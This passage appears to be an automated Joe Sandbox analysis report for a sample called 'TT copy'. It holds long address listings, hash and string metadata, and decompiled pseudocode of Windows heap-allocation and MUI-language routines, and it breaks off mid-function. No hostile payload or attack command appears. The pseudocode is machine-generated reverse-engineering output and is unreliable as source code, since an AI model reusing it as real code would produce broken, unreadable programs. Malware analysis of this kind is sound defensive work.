                                                                                                            0x0108a6b2
                                                                                                            0x0108a6b7
                                                                                                            0x0108a6c1
                                                                                                            0x0108a6c6
                                                                                                            0x0108a6d2
                                                                                                            0x0108a6d9
                                                                                                            0x0108a6e3
                                                                                                            0x0108a6e6
                                                                                                            0x0108a6eb
                                                                                                            0x0108a6ed
                                                                                                            0x0108a6ed
                                                                                                            0x0108a6ed
                                                                                                            0x0108a6ed
                                                                                                            0x0108a6f3
                                                                                                            0x0108a6f8
                                                                                                            0x0108a702
                                                                                                            0x0108a70a
                                                                                                            0x0108a70e
                                                                                                            0x0108a71a
                                                                                                            0x0108a71e
                                                                                                            0x010d1fcb
                                                                                                            0x010d1fcf
                                                                                                            0x010d1fdd
                                                                                                            0x010d1fe3
                                                                                                            0x010d1fe3
                                                                                                            0x0108a724
                                                                                                            0x0108a728
                                                                                                            0x0108a72a
                                                                                                            0x0108a72d
                                                                                                            0x0108a737
                                                                                                            0x0108a73a
                                                                                                            0x0108a73c
                                                                                                            0x0108a742
                                                                                                            0x0108a748
                                                                                                            0x010d1f4d
                                                                                                            0x010d1f50
                                                                                                            0x010d1f56
                                                                                                            0x010d1f5c
                                                                                                            0x010d1f5f
                                                                                                            0x010d1f7e
                                                                                                            0x010d1f83
                                                                                                            0x010d1f61
                                                                                                            0x010d1f76
                                                                                                            0x010d1f7b
                                                                                                            0x010d1f89
                                                                                                            0x010d1f8e
                                                                                                            0x010d1f93
                                                                                                            0x010d1f94
                                                                                                            0x010d1f9a
                                                                                                            0x010d1f9c
                                                                                                            0x010d1f9e
                                                                                                            0x010d1fa1
                                                                                                            0x010d1fa1
                                                                                                            0x010d1fa6
                                                                                                            0x010d1fa6
                                                                                                            0x010d1f50
                                                                                                            0x0108a74e
                                                                                                            0x0108a751
                                                                                                            0x0108a754
                                                                                                            0x0108a75d
                                                                                                            0x0108a75e
                                                                                                            0x0108a762
                                                                                                            0x0108a767
                                                                                                            0x010d1faf
                                                                                                            0x010d1fb0
                                                                                                            0x010d1fb9
                                                                                                            0x010d1fbe
                                                                                                            0x010d1fc2
                                                                                                            0x010d1fc2
                                                                                                            0x0108a76d
                                                                                                            0x0108a76d
                                                                                                            0x0108a775
                                                                                                            0x0108a778
                                                                                                            0x0108a77d
                                                                                                            0x0108a77d
                                                                                                            0x0108a71e
                                                                                                            0x0108a782
                                                                                                            0x0108a787
                                                                                                            0x0108a789
                                                                                                            0x010d1ff3
                                                                                                            0x0108a78f
                                                                                                            0x0108a78f
                                                                                                            0x0108a78f
                                                                                                            0x0108a791
                                                                                                            0x0108a794
                                                                                                            0x010d1ffd
                                                                                                            0x010d2006
                                                                                                            0x010d200c
                                                                                                            0x010d2017
                                                                                                            0x010d2019
                                                                                                            0x010d2024
                                                                                                            0x010d2024
                                                                                                            0x010d2024
                                                                                                            0x010d2047
                                                                                                            0x010d2047
                                                                                                            0x010d200c
                                                                                                            0x0108a79a
                                                                                                            0x0108a79f
                                                                                                            0x0108a7a4
                                                                                                            0x0108a7a9
                                                                                                            0x0108a7ab
                                                                                                            0x010d205a
                                                                                                            0x0108a7b1
                                                                                                            0x0108a7b1
                                                                                                            0x0108a7b1
                                                                                                            0x0108a7b3
                                                                                                            0x0108a7b6
                                                                                                            0x00000000
                                                                                                            0x0108a7bc
                                                                                                            0x010d2066
                                                                                                            0x010d2068
                                                                                                            0x010d2073
                                                                                                            0x010d2073
                                                                                                            0x010d2073
                                                                                                            0x010d2078
                                                                                                            0x010d2079
                                                                                                            0x010d207d
                                                                                                            0x00000000
                                                                                                            0x010d207d
                                                                                                            0x0108a7b6
                                                                                                            0x0108a440
                                                                                                            0x0108a440
                                                                                                            0x0108a440
                                                                                                            0x0108a446
                                                                                                            0x0108a44c
                                                                                                            0x0108a44f
                                                                                                            0x0108a453
                                                                                                            0x0108a455
                                                                                                            0x010d20b3
                                                                                                            0x010d20b9
                                                                                                            0x010d20b9
                                                                                                            0x0108a45d
                                                                                                            0x0108a460
                                                                                                            0x0108a464
                                                                                                            0x0108a466
                                                                                                            0x0108a46b
                                                                                                            0x0108a46f
                                                                                                            0x0108a471
                                                                                                            0x0108a471
                                                                                                            0x0108a471
                                                                                                            0x0108a474
                                                                                                            0x0108a479
                                                                                                            0x0108a47d
                                                                                                            0x0108a47f
                                                                                                            0x010d2229
                                                                                                            0x010d222f
                                                                                                            0x0108a3c8
                                                                                                            0x0108a3c8
                                                                                                            0x0108a3ca
                                                                                                            0x0108a3ca
                                                                                                            0x00000000
                                                                                                            0x0108a3ca
                                                                                                            0x010d2235
                                                                                                            0x010d223a
                                                                                                            0x010d223a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2240
                                                                                                            0x010d2246
                                                                                                            0x010d224a
                                                                                                            0x010d2269
                                                                                                            0x010d226e
                                                                                                            0x010d224c
                                                                                                            0x010d2261
                                                                                                            0x010d2266
                                                                                                            0x010d2274
                                                                                                            0x010d2279
                                                                                                            0x010d227e
                                                                                                            0x010d2286
                                                                                                            0x010d2288
                                                                                                            0x010d228d
                                                                                                            0x010d228d
                                                                                                            0x010d2292
                                                                                                            0x010d2292
                                                                                                            0x010d2295
                                                                                                            0x010d2295
                                                                                                            0x00000000
                                                                                                            0x010d2295
                                                                                                            0x0108a485
                                                                                                            0x0108a489
                                                                                                            0x0108a48b
                                                                                                            0x0108a48f
                                                                                                            0x0108a493
                                                                                                            0x0108a497
                                                                                                            0x0108a49b
                                                                                                            0x0108a4bb
                                                                                                            0x0108a4bb
                                                                                                            0x0108a4bd
                                                                                                            0x0108a4ff
                                                                                                            0x0108a4ff
                                                                                                            0x0108a501
                                                                                                            0x0108a505
                                                                                                            0x0108a50f
                                                                                                            0x0108a517
                                                                                                            0x0108a51b
                                                                                                            0x0108a527
                                                                                                            0x0108a52b
                                                                                                            0x010d2182
                                                                                                            0x010d2185
                                                                                                            0x010d2193
                                                                                                            0x010d2199
                                                                                                            0x010d2199
                                                                                                            0x0108a531
                                                                                                            0x0108a535
                                                                                                            0x0108a538
                                                                                                            0x0108a548
                                                                                                            0x0108a54b
                                                                                                            0x0108a54d
                                                                                                            0x0108a553
                                                                                                            0x0108a559
                                                                                                            0x010d2100
                                                                                                            0x010d2103
                                                                                                            0x010d2109
                                                                                                            0x010d210f
                                                                                                            0x010d2112
                                                                                                            0x010d2131
                                                                                                            0x010d2136
                                                                                                            0x010d2114
                                                                                                            0x010d2129
                                                                                                            0x010d212e
                                                                                                            0x010d213c
                                                                                                            0x010d2141
                                                                                                            0x010d2147
                                                                                                            0x010d214d
                                                                                                            0x010d2151
                                                                                                            0x010d2154
                                                                                                            0x010d2154
                                                                                                            0x010d2159
                                                                                                            0x010d2159
                                                                                                            0x010d2103
                                                                                                            0x0108a55f
                                                                                                            0x0108a562
                                                                                                            0x0108a565
                                                                                                            0x0108a567
                                                                                                            0x010d2162
                                                                                                            0x0108a56d
                                                                                                            0x0108a574
                                                                                                            0x0108a575
                                                                                                            0x0108a579
                                                                                                            0x0108a57e
                                                                                                            0x010d2169
                                                                                                            0x010d216a
                                                                                                            0x010d2170
                                                                                                            0x010d2175
                                                                                                            0x010d2179
                                                                                                            0x010d2179
                                                                                                            0x0108a57e
                                                                                                            0x0108a584
                                                                                                            0x0108a58f
                                                                                                            0x0108a58f
                                                                                                            0x0108a52b
                                                                                                            0x0108a5ad
                                                                                                            0x0108a5bc
                                                                                                            0x0108a5c1
                                                                                                            0x0108a5c6
                                                                                                            0x0108a5cb
                                                                                                            0x0108a5cd
                                                                                                            0x010d21a9
                                                                                                            0x0108a5d3
                                                                                                            0x0108a5d3
                                                                                                            0x0108a5d3
                                                                                                            0x0108a5d5
                                                                                                            0x0108a5d8
                                                                                                            0x010d21b3
                                                                                                            0x010d21bc
                                                                                                            0x010d21c2
                                                                                                            0x010d21cd
                                                                                                            0x010d21cf
                                                                                                            0x010d21da
                                                                                                            0x010d21da
                                                                                                            0x010d21da
                                                                                                            0x010d21f7
                                                                                                            0x010d21f7
                                                                                                            0x010d21c2
                                                                                                            0x0108a5de
                                                                                                            0x0108a5e3
                                                                                                            0x0108a5e8
                                                                                                            0x0108a5ea
                                                                                                            0x010d220a
                                                                                                            0x0108a5f0
                                                                                                            0x0108a5f0
                                                                                                            0x0108a5f0
                                                                                                            0x0108a5f2
                                                                                                            0x0108a5f5
                                                                                                            0x010d2219
                                                                                                            0x010d221b
                                                                                                            0x010d208c
                                                                                                            0x010d208c
                                                                                                            0x010d208c
                                                                                                            0x010d2095
                                                                                                            0x010d2096
                                                                                                            0x010d2097
                                                                                                            0x010d2098
                                                                                                            0x010d20a4
                                                                                                            0x010d20a5
                                                                                                            0x010d20a9
                                                                                                            0x010d20a9
                                                                                                            0x00000000
                                                                                                            0x0108a5f5
                                                                                                            0x0108a4bf
                                                                                                            0x0108a4d3
                                                                                                            0x0108a4d8
                                                                                                            0x0108a4da
                                                                                                            0x010d1ede
                                                                                                            0x010d1ede
                                                                                                            0x010d1ee4
                                                                                                            0x010d1ee9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1f07
                                                                                                            0x00000000
                                                                                                            0x010d1f07
                                                                                                            0x0108a4e0
                                                                                                            0x0108a4e5
                                                                                                            0x0108a4e7
                                                                                                            0x010d20cb
                                                                                                            0x0108a4ed
                                                                                                            0x0108a4ed
                                                                                                            0x0108a4ed
                                                                                                            0x0108a4f2
                                                                                                            0x0108a4f5
                                                                                                            0x010d20d5
                                                                                                            0x010d20de
                                                                                                            0x010d20e4
                                                                                                            0x010d20f6
                                                                                                            0x010d20f6
                                                                                                            0x010d20e4
                                                                                                            0x0108a4fb
                                                                                                            0x00000000
                                                                                                            0x0108a4fb
                                                                                                            0x0108a4a1
                                                                                                            0x0108a4a4
                                                                                                            0x0108a4a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108a4aa
                                                                                                            0x0108a4ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108a4b2
                                                                                                            0x0108a4b5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108a4b5
                                                                                                            0x0108a43a
                                                                                                            0x0108a340
                                                                                                            0x0108a346
                                                                                                            0x0108a600
                                                                                                            0x00000000
                                                                                                            0x0108a600
                                                                                                            0x0108a34f
                                                                                                            0x0108a351
                                                                                                            0x0108a358
                                                                                                            0x0108a3c6
                                                                                                            0x00000000
                                                                                                            0x0108a371
                                                                                                            0x0108a37a
                                                                                                            0x0108a37f
                                                                                                            0x0108a382
                                                                                                            0x0108a384
                                                                                                            0x0108a394
                                                                                                            0x00000000
                                                                                                            0x0108a396
                                                                                                            0x0108a399
                                                                                                            0x0108a3a7
                                                                                                            0x0108a3b0
                                                                                                            0x0108a3b4
                                                                                                            0x0108a3bb
                                                                                                            0x0108a3d2
                                                                                                            0x0108a3da
                                                                                                            0x0108a3df
                                                                                                            0x0108a3e1
                                                                                                            0x0108a3e5
                                                                                                            0x0108a3ea
                                                                                                            0x0108a3f0
                                                                                                            0x0108a3f0
                                                                                                            0x0108a3e1
                                                                                                            0x00000000
                                                                                                            0x0108a3bb
                                                                                                            0x0108a394

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                            • API String ID: 0-523794902
                                                                                                            • Opcode ID: db387a08ec6deb9a294e1258a6c79da5e3f78c16474b15ab2e5853ee7bdd3306
                                                                                                            • Instruction ID: 07115e80d5c145b8319b4e86465eccc37572c7d72d4bcd7216bbcd8210e2275b
                                                                                                            • Opcode Fuzzy Hash: db387a08ec6deb9a294e1258a6c79da5e3f78c16474b15ab2e5853ee7bdd3306
                                                                                                            • Instruction Fuzzy Hash: 1342DE71608742DFD715EF28C884A6ABBE5BF98204F0489AEF4C68B752DB34D981CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01122D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E01122D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1140e80);
				E010BD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E010640E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E011230C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E0106B150();
						} else {
							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E0106B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E0107EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01124496(_t181, 0);
						_t177 = L01084620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E011249A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0111FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E01061F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E010916C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01124496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x1156360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x1156364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1156366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0106B150();
								} else {
									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0110D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E0106B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E0106B150();
								} else {
									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E0106B150("Just allocated block at %p for %Ix bytes\n",  *0x1156360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x1156378 = 1;
									 *0x11560c0 = 0;
									asm("int3");
									 *0x1156378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x1155708; // 0x0
					 *0x115b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E010BD130(0, _t177, _t181);
				}
			}





















                                                                                                            0x01122d82
                                                                                                            0x01122d84
                                                                                                            0x01122d89
                                                                                                            0x01122d8e
                                                                                                            0x01122d90
                                                                                                            0x01122d92
                                                                                                            0x01122d97
                                                                                                            0x01122d9a
                                                                                                            0x01122da4
                                                                                                            0x01122dc0
                                                                                                            0x01122dc3
                                                                                                            0x01122dd1
                                                                                                            0x01122dd6
                                                                                                            0x01122dd8
                                                                                                            0x011230a7
                                                                                                            0x011230a7
                                                                                                            0x011230aa
                                                                                                            0x011230aa
                                                                                                            0x011230ad
                                                                                                            0x011230b4
                                                                                                            0x00000000
                                                                                                            0x011230b9
                                                                                                            0x01122de3
                                                                                                            0x01122de8
                                                                                                            0x01122deb
                                                                                                            0x01122dee
                                                                                                            0x01122df1
                                                                                                            0x01122df3
                                                                                                            0x01122dfb
                                                                                                            0x01122dfb
                                                                                                            0x01122df5
                                                                                                            0x01122df5
                                                                                                            0x01122df5
                                                                                                            0x01122e04
                                                                                                            0x01122e0a
                                                                                                            0x01122e0d
                                                                                                            0x01122e11
                                                                                                            0x01122e11
                                                                                                            0x01122e12
                                                                                                            0x01122e15
                                                                                                            0x01122e18
                                                                                                            0x01122e1a
                                                                                                            0x01123027
                                                                                                            0x01123027
                                                                                                            0x0112302d
                                                                                                            0x01123030
                                                                                                            0x0112304f
                                                                                                            0x01123054
                                                                                                            0x01123032
                                                                                                            0x01123047
                                                                                                            0x0112304c
                                                                                                            0x0112305a
                                                                                                            0x01123063
                                                                                                            0x00000000
                                                                                                            0x01122e20
                                                                                                            0x01122e20
                                                                                                            0x01122e23
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01122e29
                                                                                                            0x01122e2b
                                                                                                            0x01122e47
                                                                                                            0x01122e2d
                                                                                                            0x01122e33
                                                                                                            0x01122e38
                                                                                                            0x01122e3f
                                                                                                            0x01122e42
                                                                                                            0x01122e42
                                                                                                            0x01122e4e
                                                                                                            0x01122e5d
                                                                                                            0x01122e5f
                                                                                                            0x01122e62
                                                                                                            0x01122e66
                                                                                                            0x01122e6b
                                                                                                            0x01122e6d
                                                                                                            0x00000000
                                                                                                            0x01122e73
                                                                                                            0x01122e73
                                                                                                            0x01122e76
                                                                                                            0x01122e7a
                                                                                                            0x01122e83
                                                                                                            0x01122e83
                                                                                                            0x01122e83
                                                                                                            0x01122e85
                                                                                                            0x01122e87
                                                                                                            0x01122e8a
                                                                                                            0x01122e8d
                                                                                                            0x01122e92
                                                                                                            0x01122e9c
                                                                                                            0x01122e9f
                                                                                                            0x01122ea1
                                                                                                            0x01122ea2
                                                                                                            0x01122ea6
                                                                                                            0x01122ea6
                                                                                                            0x01122e9f
                                                                                                            0x01122eab
                                                                                                            0x01122eaf
                                                                                                            0x01122edf
                                                                                                            0x01122ee2
                                                                                                            0x01122ee5
                                                                                                            0x01122eb1
                                                                                                            0x01122eb3
                                                                                                            0x01122eb8
                                                                                                            0x01122ebd
                                                                                                            0x01122ec4
                                                                                                            0x01122ed6
                                                                                                            0x01122ec6
                                                                                                            0x01122ec7
                                                                                                            0x01122ecc
                                                                                                            0x01122ecf
                                                                                                            0x01122ed2
                                                                                                            0x01122ed2
                                                                                                            0x01122ed9
                                                                                                            0x01122ed9
                                                                                                            0x01122ee8
                                                                                                            0x01122eeb
                                                                                                            0x01122eef
                                                                                                            0x01122ef2
                                                                                                            0x01122efe
                                                                                                            0x01122f04
                                                                                                            0x01122f04
                                                                                                            0x01122f04
                                                                                                            0x01122f06
                                                                                                            0x01122f0d
                                                                                                            0x01122f0f
                                                                                                            0x01122f13
                                                                                                            0x01122f13
                                                                                                            0x01122f1b
                                                                                                            0x01122f21
                                                                                                            0x01122f27
                                                                                                            0x01122f95
                                                                                                            0x01122f98
                                                                                                            0x01122f9b
                                                                                                            0x01122fa0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01122fa6
                                                                                                            0x01122fa9
                                                                                                            0x01122fac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01122fb2
                                                                                                            0x01122fb9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01122fc3
                                                                                                            0x01122fca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01122fd0
                                                                                                            0x01122fd6
                                                                                                            0x01122fd9
                                                                                                            0x01122ff8
                                                                                                            0x01122ffd
                                                                                                            0x01122fdb
                                                                                                            0x01122ff0
                                                                                                            0x01122ff5
                                                                                                            0x0112300e
                                                                                                            0x0112300f
                                                                                                            0x0112301a
                                                                                                            0x00000000
                                                                                                            0x01122f29
                                                                                                            0x01122f29
                                                                                                            0x01122f2c
                                                                                                            0x01122f4b
                                                                                                            0x01122f50
                                                                                                            0x01122f2e
                                                                                                            0x01122f43
                                                                                                            0x01122f48
                                                                                                            0x01122f56
                                                                                                            0x01122f64
                                                                                                            0x01122f6c
                                                                                                            0x01122f6c
                                                                                                            0x01122f72
                                                                                                            0x01122f76
                                                                                                            0x01122f7c
                                                                                                            0x01122f83
                                                                                                            0x01122f89
                                                                                                            0x01122f8a
                                                                                                            0x01122f8a
                                                                                                            0x00000000
                                                                                                            0x01122f76
                                                                                                            0x01122f27
                                                                                                            0x01122e6d
                                                                                                            0x01122da6
                                                                                                            0x01122dab
                                                                                                            0x01122db3
                                                                                                            0x01122db9
                                                                                                            0x011230bc
                                                                                                            0x011230c1
                                                                                                            0x011230c1

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                            • API String ID: 0-1745908468
                                                                                                            • Opcode ID: 4a604c40ad5792e3d3383f13759071a7a0e815afae0e4b24949ebcfe65964389
                                                                                                            • Instruction ID: 37dd5d7b419f4996bcb47a9fc5ae7e09145ed6cf62726be89293aa372624b244
                                                                                                            • Opcode Fuzzy Hash: 4a604c40ad5792e3d3383f13759071a7a0e815afae0e4b24949ebcfe65964389
                                                                                                            • Instruction Fuzzy Hash: D0915471A10661DFDB2EDFA8C440AEDBBF2FF49704F08801CE5959B251C73A98A2CB15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01073D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E01073D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01071B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01071B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01071B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01071B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01071B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01084620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E010AF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E010B1370(_t276, 0x1044e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E010ABB40(0,  &_v68, _t170);
									if(L010743C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
